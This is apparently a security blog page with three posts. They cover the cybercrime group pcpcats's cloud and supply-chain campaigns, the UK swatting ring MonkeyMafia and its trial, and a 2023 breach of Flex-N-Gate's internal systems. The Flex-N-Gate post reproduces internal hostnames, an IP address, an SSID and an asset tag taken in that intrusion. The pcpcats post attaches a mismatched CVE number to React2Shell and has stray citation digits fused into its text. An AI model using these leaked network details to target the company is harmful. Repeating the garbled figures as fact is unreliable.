Monday, June 29, 2026

Underground Hacking Exposed | Ctrl-Alt-Del

 pcpcats: A Cloud-Native Cybercrime Operation

pcpcats is a financially motivated hacking group that emerged in late 2025, known for large-scale, automated attacks on cloud infrastructure and open-source supply chains. The group focuses on exploiting misconfigurations and known vulnerabilities to build self-propagating botnets used for credential theft, data exfiltration, proxy networks, cryptocurrency mining, and extortion.0

It maintains a public presence primarily through the @pcpcats handle on X and associated Telegram channels for data leaks and updates.

List of Major Attacks and Campaigns

1. Operation PCPcat / React2Shell Campaign (December 2025)

  • Targets: Exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and React/Next.js applications vulnerable to React2Shell (CVE-2025-29927).
  • Method: Automated scanning with tools like pcpcat.py and react.py; RCE via prototype pollution and command injection; deployment of malicious containers with Base64 payloads.
  • Scale: Tens of thousands of servers compromised (estimates of 59,000–60,000 in under 48 hours).
  • Outcomes: Credential harvesting, persistence via systemd units, tunneling, data theft, and infrastructure for further attacks. Signatures included “UwU PCP Cat was here~”. Victims spanned multiple countries including the US, Canada, South Korea, Serbia, and UAE.1619

2. JobsGO.vn Data Breach (Claimed January 2026)

  • Target: Vietnamese online recruitment platform.
  • Method: Exploitation leading to exfiltration of over 2 million records (personal and professional data).
  • Outcomes: Data published via affiliated leak channels.15

3. Supply Chain Attacks (March–June 2026)
The group conducted cascading compromises across package ecosystems (NPM, PyPI, OpenVSX, etc.):

  • Aqua Security Trivy (March 2026): Malware injected into the vulnerability scanner, affecting downstream CI/CD pipelines.
  • Checkmarx KICS, LiteLLM (high download volume), Telnyx, and dozens of additional packages.
  • TanStack and related ecosystems (e.g., Mini Shai-Hulud worm).
  • Nx Console and VS Code extensions leading to GitHub internal compromise.
  • Method: Poisoned packages with credential-stealing malware; harvested secrets used for lateral movement into AWS and other clouds.
  • Scale: Hundreds of packages affected; thousands of downstream organizations impacted; hundreds of GB of data exfiltrated (self-reported figures exceed 300 GB and ~500,000 credentials in some summaries).7381

Notable Victim Organizations/Impacts (Partial List):

  • Mercor (AI startup): Multi-TB exfiltration including source code and personal data.
  • European Commission infrastructure (via supply chain).
  • GitHub: Access to ~3,800 internal repositories (May 2026).
  • Various open-source projects and enterprises using compromised tools (OpenAI employee devices reported in some chains, among others).79

Additional waves included further npm/PyPI poisoning, Kubernetes targeting (e.g., CanisterWorm with wiper components in some cases), and ongoing cloud credential harvesting.

Federal Investigations

As of the latest available public information (June 2026), there are no confirmed ongoing federal investigations, indictments, or arrests publicly linked to pcpcats. The group’s operations remain active in the cybercrime underground with no major law enforcement disclosures reported in open sources.63

Implications

pcpcats demonstrates the dangers of exposed cloud services, delayed patching in web frameworks, and supply chain trust. Its campaigns highlight how automation and opportunistic exploitation can achieve massive scale with relatively known techniques.

Organizations should prioritize:

  • Securing management APIs and cloud exposures.
  • Rigorous supply chain verification and dependency scanning.
  • Credential rotation and secret management.
  • Monitoring for known IOCs (e.g., specific C2 infrastructure, file paths like /opt/pcpcat/, and process patterns).

Underground Hacking Exposed | Ctrl-Alt-Del

 MonkeyMafia: Inside the British Teen Swatting Ring That Terrorized Streamers and Public Institutions

In the shadowy corners of online chat groups, a loose collective known as MonkeyMafia emerged as a notable player in the dangerous world of swatting. Operating primarily from the UK, this group of young individuals turned hoax emergency calls into a twisted form of entertainment and status-seeking. Between late 2022 and mid-2023, they orchestrated false reports that sent armed police scrambling to homes and institutions, all in pursuit of online notoriety. liverpoolecho.co.uk 

Swatting involves fabricating urgent threats—such as active shooters, bombings, or violent incidents—to provoke a heavy law enforcement response. For MonkeyMafia, success often meant watching the chaos unfold in real time, especially during live streams. What started as edgy online banter escalated into coordinated campaigns that crossed international borders and drew serious legal consequences. bbc.com 

Origins and Core Participants

MonkeyMafia was never a tightly structured organization with formal leadership. Instead, it resembled a fluid Discord or Telegram community where members drifted in and out. Some actively planned calls, while others simply observed or cheered from the sidelines. The group leveraged platforms like Telegram, X, and Discord for coordination and bragging rights. warringtonguardian.co.uk 

Two teenagers became central figures in public scrutiny:

•  Dylan Ash, from the Warrington area (later associated with Deal, Kent), stood accused of deep involvement, including efforts to keep activities alive after initial crackdowns.

•  Kieron Ellison, from St. Helens in Merseyside, faced allegations tied to the group’s peak period.

A third individual, Liam White, was mentioned in connection with later revival attempts but did not appear in the main trial alongside the others. Court accounts described participants as often young and isolated, drawn into the scene for the thrill and sense of belonging it provided. warringtonguardian.co.uk 

The syndicate occasionally intersected with wider networks involved in similar disruptions, sometimes promoting paid “services” for swatting requests. vice.com 

Campaigns of Disruption: Targets and Tactics

MonkeyMafia focused on high-visibility targets to maximize impact and attention. They repeatedly went after popular American livestreamers, timing calls during broadcasts to heighten the spectacle. Notable figures included streamer Kai Cenat and Adin Ross, with the apparent aim of having tactical teams burst into their homes on camera. liverpoolecho.co.uk 

Beyond celebrities, the group hit a range of institutions across the US and Canada. False alarms claimed armed threats or explosions at universities, schools, hospitals, and hotels. In the UK, they made local calls, such as one alleging a machete fight outside a McDonald’s. liverpoolecho.co.uk 

Callers used spoofing techniques to mask their locations while providing convincing details to dispatchers. The objective ranged from personal humiliation of targets to broad societal disruption—triggering lockdowns, evacuations, and fear. Group members often celebrated their “wins” publicly, treating the resulting panic as a badge of honor in their circles. sthelensstar.co.uk 

These actions carried real-world peril: SWAT responses involve armed officers operating under high stress, and any miscalculation could lead to tragedy. Even without physical injuries in every case, the emotional toll on victims and the drain on emergency services were substantial.

Law Enforcement Response and Court Battles

Authorities eventually caught up. Arrests in June 2023, including Ellison’s, appeared to fracture the original setup. UK police worked with US counterparts, gathering evidence such as call recordings, chat logs, and digital footprints. liverpoolecho.co.uk 

In 2026, Ash and Ellison, then both 19, went on trial at Liverpool Crown Court. Prosecutors charged them with multiple counts of conspiring to pervert justice and bomb hoaxes. Ash faced an additional allegation of continued involvement into 2024. The case highlighted recordings of the hoax calls and their targeting of specific individuals. bbc.com 

The trial faced a setback when the jury was discharged in June 2026 due to an unforeseen issue, leading to a retrial scheduled for July 2027. Both young men denied the charges. bbc.co.uk 

Attempts at Revival and Rebranding

Like many online groups facing heat, MonkeyMafia members allegedly tried to reinvent themselves. After the initial arrests, efforts surfaced to launch successor operations under fresh banners such as “Kat Squad” and “Syndicate Squad.” These phoenix-like rebrands aimed to sustain the swatting hobby while dodging attention. liverpoolecho.co.uk 

Some channels went dark, with occasional posts from administrators claiming they were moving on with their lives. However, the pattern reflects a persistent challenge: dispersed digital networks can regenerate quickly even after key disruptions.

The Bigger Picture

MonkeyMafia illustrates a modern strain of online mischief that blends trolling culture with genuine criminal risk. Easy access to communication tools allows small groups of determined youths to create outsized international problems. Their story aligns with broader waves of swatting incidents affecting schools, events, and public figures in recent years. justsecurity.org 

Law enforcement agencies continue pushing back through cross-border cooperation and improved tracing of digital calls. For society, it serves as a reminder that “harmless pranks” in the digital age can endanger lives and erode trust in emergency systems.

As legal proceedings continue, the full scope of MonkeyMafia’s reach may become clearer. In the meantime, their case underscores the need for vigilance—both from platforms hosting these communities and from individuals tempted to join them. Swatting isn’t a game; it’s a reckless gamble with someone else’s safety on the line.​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​

Underground Hacking Exposed | Ctrl-Alt-Del

2023 Compromise of Flex-N-Gate Internal Systems

In 2023, a member of the pwnp0ny collective known as kahmi reportedly gained unauthorized access to several internal systems belonging to Flex-N-Gate, a global automotive and plastics manufacturing company. The intrusion was not publicly disclosed at the time, but screenshots and data samples later circulated in private security channels.


Scope of Access

The attacker obtained access to multiple internal resources at the company’s Danville, Illinois facility:


1. Employee Production Roles System

A legacy interface titled “Set Employee Production Roles” was accessed, revealing employee records that included:

•  Employee numbers

•  First and last names

•  Internal Emp_Tag# values

•  Assignment details (many listed under DFT class/group)


2. Internal IT Helpdesk Portal

Access was achieved to the FNG IT Help Desk/IS Global Service Desk. A profile for an account named “ILDN Maintenance” was viewed, listing the location as FLEX-N-GATE PLASTICS DANVILLE and timezone as USA – Central Time.


3. Corporate Wireless Network

Network configuration details for the SSID “FNGOffice” were captured, showing WPA2-Enterprise with PEAP authentication running on a Dell laptop (asset tag ILDNENLT07).


4. Network Asset Discovery

Most significantly, the attacker viewed a live inventory of the internal network, which listed 85 connected devices on the FNGOffice segment. Visible assets included:

•  ILDNSVDC2 – Microsoft Virtual Machine (10.137.128.1)

•  ILDNSVHV1 – Dell PowerEdge R540 server

•  Multiple additional Microsoft virtual machines (ILDNSVFS1, ILDNSVME1, ILDNSVUT1, ILDNSVDB1, etc.)

All hostnames followed a consistent “ILDN” naming convention, further confirming the geographic scope of the breach. 


Timeline and Context

This activity took place in 2023. The intrusion demonstrated a methodical approach: starting with operational systems, moving laterally to IT service portals, and eventually achieving visibility into network infrastructure and active assets. There was no evidence of data destruction, ransomware deployment, or public defacement — characteristics often associated with pwnp0ny operations.


Lessons from the 2023 Incident

The compromise highlights several persistent risks in industrial and manufacturing environments:

•  Legacy production systems frequently remain accessible with weak controls.

•  Internal helpdesk and administrative portals can serve as valuable pivot points.

•  Flat network segments combined with enterprise Wi-Fi allow broad visibility once initial access is obtained.

•  Asset naming conventions and exposed hostnames can significantly aid reconnaissance.

Organizations in the manufacturing sector should treat this case as a reminder that even seemingly isolated operational technology (OT) and IT systems can provide pathways to broader network awareness.

While Flex-N-Gate has presumably taken remediation steps since the 2023 incident, the event underscores the importance of network segmentation, regular credential hygiene, timely system modernization, and continuous internal monitoring.


Note:

*This post is for educational and awareness purposes in the cybersecurity community.*​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​

Underground Hacking Exposed | Ctrl-Alt-Del

  pcpcats: A Cloud-Native Cybercrime Operation pcpcats is a financially motivated hacking group that emerged in late 2025, known for large-...